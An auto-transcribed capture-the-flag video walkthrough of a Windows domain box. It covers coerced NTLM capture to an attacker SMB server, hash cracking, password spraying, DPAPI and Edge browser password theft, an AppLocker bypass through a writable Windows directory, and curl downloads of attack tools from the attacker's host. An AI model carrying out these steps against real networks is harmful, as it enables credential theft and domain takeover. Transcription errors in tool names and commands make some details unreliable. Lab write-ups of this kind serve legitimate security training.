honestly expecting the firewall to block me, but since this is kind of a painful thing, I'm not going to go through all the trouble in trying a reverse shell, because I'm 99% sure that this is in constrained language mode, and we can validate that before we move forward with, let's see, if I do, is it execution context dot session state language mode, which if it is in constrained language mode, we won't be able to use like the new object command or things like that, which would completely break any type of reverse shell, right? So the date says 1942-29. It is 42:59, so I literally just missed it. So I'm gonna have to sleep for 2 minutes now, and then we'll see the updated file. I can just get, let's just check but verify, right? If I get this cat debug users, it's blank. So let me just double check this file. Execution context session state language mode. Yep, that looks good. So we're going to let that sleep finish and we'll check this file. Okay, 2 minutes has passed. If I do a dir, we can see 44. So let's get debug users.txt. If I cat this, I can see constrained language. So this is going to prevent me from doing any type of reverse shell. We could try like uploading netcat and doing it that way, but there's also app blocker that that prevents us. And enumerating app blocker and doing all that type of thing through this 2-minute wait is pretty painful. So I'm going to skip that whole troubleshooting part because again, it's just running rules and then waiting 2 minutes and doing that loop. Admittedly, this is not my favorite part of the box. It is rather annoying. But one thing we can do is try to steal the password of this user. And if we just used a regular SMB, so I can show this failing real quick. So if I did, let's do GCI for get content item, and then I think I might just do it this way. 10, 10, 14, 8. And then a share name and a file. If we do this, ldap modify, that looks good. We can sudo smb server, and then the share name, which is ipsec, my current working directory. Let's just make dir smb. I typoed that, but that'll be fine. Python 3, smb, what was it? SMB server, share name, working directory, then SMB to support, and run this with sudo. And that's the sudo lets us listen on 445. We're going to see it connect back to us, but it's not going to attempt to authenticate, or at least it shouldn't, because if we look at the SMB client without -k, so sudo proxy, just proxy chains, SMB client -l 192.168.0.2. If I don't do -k and try to log in, the NTLM way to log in gets not supported. So since NTLM is not supported, it shouldn't give me credentials just based with IP address. I need to use a DNS name. So right now we're waiting on it to call back. Let's just do this modify again, just in case it's wrong or it like reverted itself. Get content item 10.10.14.8 ipsec test. Okay. dir 48. And what is this? 50. So within the next 30 seconds, we should get a hit to IM packet. So while we're waiting for that, let's just modify that again to be safe. The hostname of this box is webserver. And if I ping webserver.wincorp.htb, that is this box. We could also do NS lookup and then server 192.168.0.2, which is the DNS or the DC, webserver.wincorp.htb. We also get that address. So we do have a DNS name. I'm going to look at SMB server and we see nothing here. So it didn't give us any authentication. So the issue we have right now, if I just do a -r And then let's listen on 192.168.0.100, port 445. And then we're going to forward it to our box at 127.0.0.1.445. And then I do SSLNTP. Even though we specify we should listen on 192.168.0.100, we listen on 127.0.0.1. And this is a SSH configuration. So if we went into the SSH config, so SSHD config, and then change GatewayPorts to yes, and then run this again. So let's do service, SSHD restart. I wonder if I'm going to have to restart my whole connection. Let's see. If I do -H, it tells me how to remove something. So KR, then 192.168.0.1. Oh, it's probably 127. 445. Let's see. -KR, 192.168.0.100, 445. So it even saved it as 192.168, which is interesting. But we see we're not listening there. It's been 2 minutes, so you can see that hit, but -R, 192.168.0.100, 445, 127.0.0.1, 445. I don't envision this working, so I'm going to copy this. Yeah, it's still at 127. So let's refresh our SSH session and connect back in. Because we restarted the service, but when we restarted the service, it didn't force us to restart our process. And I think that configuration was just saved in whatever process was handling our SSH connection. So once we get back into the server, we're going to run the same exact command. It's just going to be a copy and paste. Almost copy and paste. Wow. That's annoying. -R, 192.168.0.100, 445, 127.0.0.1, 445. There we go. So now I do SSLNTP grep 445. We can see it is listening on everything. And this is what we want. So now we can point the server to this host, which then gets mapped back to our host, right? Because the SMB socket listened on this IP 445, and it's sending it to, or through the SSH session to this. That's what we just did. So let's go back to dev shm v duncan.diff, and we're going to say GCI, and this time I'm going to do windcorp, or was it webserver.windcorp.hdb, right? Yep. And then ldap-modify -h ldap windcorp.htb -f Duncan, and I just missed the time, which is a shame. Let's do proxy chains as well. -d 1080. Date, or dir, we gotta go in temp. It is 1954. 54, so let's just sleep 2 minutes, and we'll get a NTLM hash hopefully this next time. And here we go. So we have a hash for script runner now. If I copy this and we go back into the Kraken, go into hashcat, v hashes / NTLMv2 dot script runner, paste that in, and let's just try cracking it. So that opt word list rock you, and see if it automatically detects it. It looks like it does, and it has already cracked. So if I do --show, we can see script runner has this weird password. So I'm going to copy this. We'll go back to this pane and v password.text. We have that. We also have Pantera as a password. So the next step I want to do is password spray to see if there's any other users sharing the two passwords we have. So to do that, I'm going to use kerberos. But before we do that, we have to do ldap search again. So ldap search -h ldap windcorp.hdb -b dc is windcorp, then dc is hdb. Okay, less, and let's get all the usernames. So Ray, let's see. We can probably just grab this. Well, no, because we want the name. It's probably like Sam account name. There we go. Sam account name is what we want. So let's just direct this to ldap.out grep dash, or yeah, Sam account to ldap. And let's see. Sam account name. That is a lot of names. Awk print 2 sort -u. I'm going to get rid of everything that ends in a dollar because those are going to be like machine accounts, the like group managed service accounts, things like that. That's not what we want, right? So we're going to escape dollar, then dollar for grep everything that ends in dollar. That looks better. Some of those are groups, like users as groups, things like that. I think that'll be fine though. So I'll just call this users.text. Cat users.text. That looks fine. Let's cat passwords.text and just paste these in. I could SCP it, but honestly, I think it'd be faster to copy and paste. Passwords.text, paste it. Okay. The next thing is kerberos. So I'm just going to do kerberos, then GitHub. And the reason why I'm doing everything on this box is I don't believe Golang binaries really like proxy chains, because proxy chains takes advantage of like LD preload. And because everything is statically linked in Golang, LD preload things don't work with it. So I don't think you can proxy chains Golang. There's probably like a special program that does it, but this is the benefit of Golang is you can run things anywhere. They're all statically compiled. So it's just easier to do this way, at least for me. Root at 10.10.11.179, I think the IP address was. And we want to copy kerberos, colon. It's going to take, I don't know why it's taking, let's see, z-v. It's attempting this GSS API authentication with Mike, and that's where it hangs. And then it goes to password. Weird. It's not going right to left. It tries public key first. Or maybe after GSS failure, it then attempted the public keys and finally transferred kerberos. So maybe I'm wrong there. So let's just go to root, chmod plus x, kerberos, and then we can execute it. I'll do -h first, and we want password spray. So we can do password spray. Let's see, actually, yeah, password spray will be fine. So password spray -d windcorp.hdb, the users dev shm users.text, and we can try Pantera first, because this should not really take long. It finds Ray Duncan. The other password we had, dev shm passwords.text, is this weird one. So let's copy, and then we can paste this password. And we get two users, bob@windcorp and script runner. So one thing I guess we should have tried first is evilwinrm as script runner when we got that password. So proxy chains, evilwinrm, Then -k, we can do, actually, proxy chains kinit script runner. Paste this password. And now we should be able to do proxy chains evil winrm -k-u script runner -d wincorp.htb. Is that how we do it? Let's see. Maybe -r for realm. Missing IP. Let's see. Realm. We probably want hope.windcorp.htb. Did not return. So I don't think it works with that user. Let's try a, let's see, still have that. So proxy chains kinit bob.wood. Paste it. And let's try bob.wood. And we get access. So now we have access, or PowerShell access as Bob Wood on this box. And the reason why I'm not going to do a lot of the normal things like running WinPs and things like that is just because I know there's a lot of protections already on this box. For example, we're still in constrained language mode. So if I do execution context, session, state, language mode, we see I made a typo somewhere. Execution. There it is. There we go. Constrained language. So I can't use a lot of like the new object net.web client, things like that, or injected.net binary to run things. I'm not going to do like just download WinPs to this box because there's also app locker rules and we'd have to find a bypass. I'm not saying you can't really bypass all these things. We're going to show it at the end of the video, but I think the more red teamy thing to do is just start off the whole process what you should do whenever you get on a box, and that is get all the DPAPI secrets, because that's like Windows internal credential manager. You can download all the encrypted blobs, and I normally download them first and then wait for later in the assessment when I can get the decryption keys, and you decrypt them. You never know what you're going to get. It's like opening a treasure box, right? So let's go to app data, because this is going to be where the master keys are stored. And each master key is for that user, right? I say master key, but it's just not like, it's the master for that user, not like everything. So that's going to be in Microsoft, and then protect, I want to say. Actually, no, I got to go to roaming first, because this is a roaming profile. It follows you where you log in. And then we get Microsoft Protect. If I do GCI, here is the SID of the user. So let's just go into that directory. I'm also going to take note of the SID. So vnotes, SID, and we'll put that in because that is important later. And if I do GCI, we don't see anything. But if I do GCI-force to show me hidden files, there are two files here. We got this 3EB and A8. I think one of these is going to be the domain, like it's encrypted via the domain key, and one is encrypted via the user's password. So I want to download both of these files. And they're blobs, so we want to make them base64. However, since constrained language mode is, it's going to block us easily from getting the base64, right? So if I do file is equal to get content item this, let's see, GCI. I thought that would work. Is it just F is equal? Let's see. GCI A8, let's do star. Dash force. Oh, it's probably get content and not get content item. Let's see. Get content. There we go. So now the F is equal to a weird blob. So we want to convert this to bytes first. So if I do bytes, then system text encoding unicode dot get bytes, and then F. We see we can't do this because we're in constrained language mode. We could use a lol bin like certutil. So certutil-encode, and then the file we want, I think it began with A8. Let's do actually just gci-force, and we can copy and paste. Certutil-encode, copy, and we'll do this, .zip. And we'll do it with the other one. Certutil-encode, filename.zip. I don't know why I'm saying .zip. It's .base64. Oh well. Get content, this .zip. And we just have base64 of the file. So let's copy. Go here. And I'm going to make dir dpappy move notes into this. And v, this file, paste, move to this. .b64, and we'll decode it. Okay, so now we have one of those files. Let's get the other one. So that was 3e. So we'll get content A8 and get this zip. CI-force. Copy A8, go back here, V, paste, base64-D. Okay, I'm going to MD5 sum both of these, make sure I didn't copy the same thing twice. Okay, they are different. That is good. So now we have the master keys of this user. So the first place I would go after this is where dpappy stores blobs. So that would be probably like roaming, Microsoft credentials. And we do gci-force, and we don't have anything. So there's nothing there. We could try, let's see, local, Microsoft credentials, and we don't have anything there. So another place to look at now is where like Edge is stored. So if we go into Edge, gci-force, we want to get user data. And let's see, there is, I want to say local state is going to contain some of the secrets. Now, there is another file. I think it's called login data. And I think it's in default. gci-force login. Yeah, there is a login data. So we want to grab this because this is going to be a SQLite database of all the passwords. So let's do certutil-encode login data, and we'll do login.b64. And this is going to be a big file. So login.b64. And I'm going to search up for login.b64. So we get there, go to the beginning of the line, and highlight everything to copy it. Okay. Go back to the pane, v, login.b64, paste, base64-d. And this is a SQLite database, I know. So if I do SQLite login.SQLite, let's see, SQLite 3.table, we can see the tables. If I select star from logins, we can see there is some information here. Like we got bob.wood, and then an encrypted password is right here. I think there's another encrypted password right here. So we want to be able to decrypt these passwords. And that is going to be in the state file that I mentioned before. And that's just in user data. So GCI, is it just, what is it? State like this? I think it's local state. GCI local. Yeah, this is what we want. And this is not a like encoded file. It's just a big JSON blob. So we can just copy this. We don't have to use cert-util to encode it. And I probably should have used something to search to the top so I can copy it faster, but oh well. There we go. Let's go back here. V state paste, and we can cat state jq dot and see everything we want, right? But there is a encrypted key, and this key is going to be the secret that is able to decrypt everything in the cookies. However, it is protected by dpappy. So the way I'm going to do this is using PyPyCats. So if we went to PyPyCats, go to GitHub. How I did this is I cloned the repo and then did the setup py install. But you can probably do it via pip or do other things. But once you get PyPyCats on the box, you can just execute it with PyPyCats. And this will let us use the Chrome dpappy commands to retrieve everything we want. But first, we want to get information about the blob we want to decrypt, and that would tell us which file to use. We could just guess and do it twice and always get to the end result, but we like to be scientific. So the decrypted thing, or the thing we want to decrypt, is in state. So let's cat state JQ, and it was encrypted key. And all I want to do is show that's just it with an OS crypt encrypted key. So we're going to use JQ again. We're going to say raw so we can get rid of the double quotes. And then we just do .os underscore crypt .encrypted key. And if I write this, we can do base64, dbase64 it. And then write this to dpappy blob. It's really dpappy protected blob, but oh well. If we look at the file, we see it begins with dpappy, and that's just the magic bytes. And we want to get rid of these magic bytes because all we care about is this. And that's 5 characters. So if we cut and grab everything after the 6, or the 6 and going forward, we'll get what we want. So we'll do cut -c6-, and then write that to dpappy blob, view it, and now we just have this. So we can run PyPyCats and then dpappy. And if you do like -h, you can get all the options. We want to describe, and then look at this. We can describe various things. We want a blob, and then we give it the file, dpappy blob. And this gives us everything about it, but will tell us, most importantly, what the master key GUID is. And that's that A8 thing. And if I look, we do have a master key with that. So we'll have to do create a pre-key, which is just going to contain a lot of information that's used to decrypt it. And that's just the SID and the password, right? So let's do PyPyCats again, then dpappy. If you did -h, you can also see all these things like the pre-key generation. But we do pre-key, and then -h, and see how we want to generate the key. Since we know the password, we can do it from that. So we can do password, and then it's going to want a SID and the password of the user. So I did cat, let's see, cat dpappy notes. We do have the SID. Copy. And then we want the password. I think I have that in this file. There we go. And this is the password of bob.wood. And that's also the SID of bob.wood, right? So if I do this, we can see it gives us 3 hashes, right? So we're just going to send that to a file. We'll call it, I guess, pre-key file. I'll call it like that. I was thinking of just like pkf, but that may not be intuitive later, right? So now we want to do PyPyCats, dpappy, and then master key, the master key file, and then we do the pre-key file. And let's see, no such file or directory because I need another one there. There we go. So this creates the file for PyPyCats. This is the GUID of the key, and this is the master key. So we can just do a -o, and I'll call this master key _ file. And when you do the output format, it changes it to JSON. And you can just hand put multiple master keys in this dictionary, and it'll work just fine. So if you had multiple things you want to decrypt to multiple users, I just create one big master key file. So now the final step is finally using that master key to decrypt the data out of Chrome. And I say Chrome when it's Edge because Edge is based off of Chromium, so Chrome and Edge are do it the same, right? So we give it the login data file, and that was, I think I just called it, what'd I call it? Let's go in dpappy. It was the SQLite file, login.sqlite. And then we want to give it the master key file and then the state. And we called the state just state. And there we go. We have a few passwords. So if I do ~s, so we put it all on one line, we have, I wonder, I guess that is weird characters, some secure password, and we have bob.wood ADM set to this. So let's just direct these to Bob's creds.txt. And the most interesting one is bob.wood ADM at wincorp.com. So let's try this. So proxy chains, kinit, bob.wood ADM. And we'll copy his password, paste it in. And it looks like we get authenticated as him. So we now can do proxy chains, evil winrm, -u bob.wood ADM, -r for realm, wincorp.htb, -i for IP, wincorp.htb, and I want to say it was hope.wincorp. Let's see. Something screwed up here. Klist. I'm going to remove my kerberos tickets. Klist is empty. Let's just redo it. I'm not sure if I had like Bob Wood's credential stored, right? So now that, oh, I probably forgot. I think there's like a -k to do kerberos. Huh. Something screwed up there. I'll exit this session. -k, -u, -r, -i. I had -k before, then -u, -r, -i. wincorp.htb. Huh. Let's see what the command looks like. We have -k, wincorp. Oh, forgot the D. And let's see if we get in now. Yep, we are. If I do whoami/all, we should see we're a member of domain admins. Let's see. Let's highlight all admin fields, built-in administrators, and domain admins. So now we can go to the desktop and grab the flag. I thought GCI, it's probably administrator. Administrator, desktop. And there's root.txt. So that is doing it the way I would recommend doing it, by not even worrying about bypassing constrained language mode and app blocker. But let's take a step back and look at those technologies, right? We're going to have to go back to klist to delete our admin ticket, and then do another kinit, this time with just bob.wood, Pantera is the password for Bob Wood. Pantera. I thought it was. Oh, no, Ray Duncan's was Pantera. Bob Wood is a weird password. Let's get that. There we go. This is Bob Wood's password. Okay. So now let's go back to our evo winrm. And here we are. So typically the first thing we want to do is run winps. So let's grab the latest copy from GitHub. So going to winps. And then once we get here, I'm going to go to the parent directory so I can get to releases. And we'll download winps any.exe. So let's just wget. Let's make a directory www and then wget it. And now I'm going to start a web server. And we generally go in program data first to write files, right? So let's do a curl HTTP 10.10.14.8 port 8000. And then the file name, which is winps any.exe. And we'll give that just winps.exe. So once this downloads, we can try to execute it. So winps.exe, and we see it's blocked by group policy. So this is probably going to be some type of app locker rule. So we can run get app locker policy, then -effective, and we also want -xml. And I'm going to go to the beginning of the line and copy everything to my box so we can view it. And now there's two different bypasses here. There's an unintended and an intended bypass because, well, security is tough, right? And the unintended bypass is super easy to understand. Well, understand how it happened, right? I think it's just a new directory was added that was world writable. But if we're looking at this policy, this is showing all the places that are able to be removed. And I think, or able to be like, these are the directories that are world writable by default in Windows. And generally an app locker, if you can write to C:\Windows, you can bypass it because there's a whitelist just whitelisting this directory. The reason for it too, I think, is alternate data streams, is I would guess that's what the colon means, but again, not positive there. But we can see a list of the world writable places that is blocked. And if we just Google something like app locker bypasses, and we go to like the ultimate app locker bypass list off GitHub, because it sounds really good, right? We can look at the index list of this, and every single one of these is blocked. I'm not going to go through each one because that would be a lot. But if you just look at Windows tasks, Windows temp, we can see task is blocked, temp is blocked, servers, printers, drivers, color. We can see all those things here, right? I didn't look at the unverified one. These are just all lol bins. These are lol bins as well. If I look at install util.exe, we can see there is a rule denying it. Now, if I looked, there is 2 .NET frameworks installed, and so there's 2 different install utils, and only one is blocked. So that is the intended way, is to be able to use the install util lol bin. However, if we Google like rolled writable directories Windows, we'll get to this just by manifestation. And there's one here that's not on the ultimate app locker bypass list, the C:\Windows debug WIA. I'm guessing this is like Windows instrumentation something. But if I look on the box, cd/Windows, then cd debug, cd WIA, we can see this directory exists, and there's no mention of WIA in this app locker thing. So this is a directory where we can bypass. So I'm going to move program data winpeas.exe here. And then let's just execute winpeas.exe and see what happens. So it looks like WinPeas is now running. So I'm going to let this just run for a little bit, then we'll come back when it's done and see if it points out anything related to dpappy and things like that. Okay, so this is done, and I hate to say it, I don't think it really helps that much. So if we look at WinPeas, it gave a lot of information, probably like 5,000 or 6,000 lines. A lot of things are just like reporting on world writable directories like this SQL and Windows System32 spool drivers color, but AppLock is preventing execution here. So it's all a good defense in depth methodology. They didn't remove write permission from that directory, but they removed the ability to execute. So even though we can write, it's covered here. We do have it calling out this one, though, the directory that we wrote WinPeas in, telling us that authenticated users can read and write files there. And this one doesn't have a app blocker rule. But there's a lot of information about just the domain users, things like that. If I search for dpappy, we can get to where it talks about it. So we see, let's see, this is going to be the master keys that we decrypted. We left the .zips, so that's why WinPeas is showing it. We also have no credential files, but the thing I mainly was surprised about is right here. Firefox, obviously no databases. I'm kind of surprised it didn't detect any Chrome databases. I know it's Edge, right? But Edge is based upon Chrome. I bet if we run like, I forget what the sharp thing is to dump Chrome credentials, but they added support for Edge. I guess WinPeas just doesn't have it. So that may be a video for another day showing how to edit the Windows version of WinPeas, because I know a few videos ago we did the Linux, so might as well cover both. But that's the main thing I wanted to show. We can go back and look at every directory with Edge. We can see nothing really about local state or user data, which is required. I honestly don't know what this file is, this passwords.txt in this directory, so we can take a look at that. But I was just looking for everything with Edge and did not find it. Let's see, what is this passwords.txt? Maybe we have to do it in quotes. That will be fine. That is, I guess, a list of bad passwords that Chrome or Edge may prevent you from using. I have no idea what that is. And I may have just killed my Evo WinRM connection. Okay, so I want to run sharp dpappy. I think that's the tool. It is in GhostPack, which means it's probably not going to be compiled for us, right? But we can see Chrome is here. I'm just curious, if we go to Chrome, program, does this have Edge? Let's see. Maybe I can just search the repository. Yeah, so it will use Edge things in this one, even though it's the chrome.cs program. It is going to Microsoft Edge. So what we want to do now is see if we have a copy of sharp dpappy on our box, because I think I do. And the main thing I wanted to get was this sharp collection. So if we go opt sharp collection, we can just do a git pull to download the latest. And this sharp collection is just a GitHub repo, right? So let's go to Net Framework 4.7 any, and then there should be grep-i dpappy. Let's copy this. There's a few. I guess Sharp Chrome is another one, Sharp Chromium. I don't know what all those are, but let's try this one first. HTB, and then the box name was Sekhmet, dub. We copy it there. And we can go cd windows debug wia curl http 10.10.14.8 port 8000 sharp what was the name, dpapi.exe. Let's just copy and paste it. -o. And if we execute it, it wants us to give at least one argument. So retrieve dpappy user triage. Certificate. Let's see. I'm going to copy Sharp Chrome. I have not actually used these programs before, so I'm trying to find one that just works easy. We'll do Sharp Chromium. And that's the benefit of doing boxes like this, right? You get to see all the tools, or play with ones and then know which ones work well. I like doing it all offline because I don't like running random .NET things. Sharp Chrome. It looks very similar. I'm guessing Sharp Chromium is going to do the same thing, right? Let's download that. EM. Do all. Let's see. We couldn't do cookies. I wonder if I just do logins? Beginning edge extraction. So it's thinking. And there we go. So Sharp Chromium worked. We just specify logins and it detects the creds, right? So if we wanted to bypass the constrained language mode and get PowerShell, we could just run, I think, let's see. I think this program by Caleb Stewart would work. He doesn't have a release, but if you compiled this, you'd be able to escape the constrained language mode as well. The key piece being just writing anything to this debug/WIA directory. So I think that's what I'm going to conclude the video. Hopefully you guys enjoyed it. Take care, and I will see you all next time.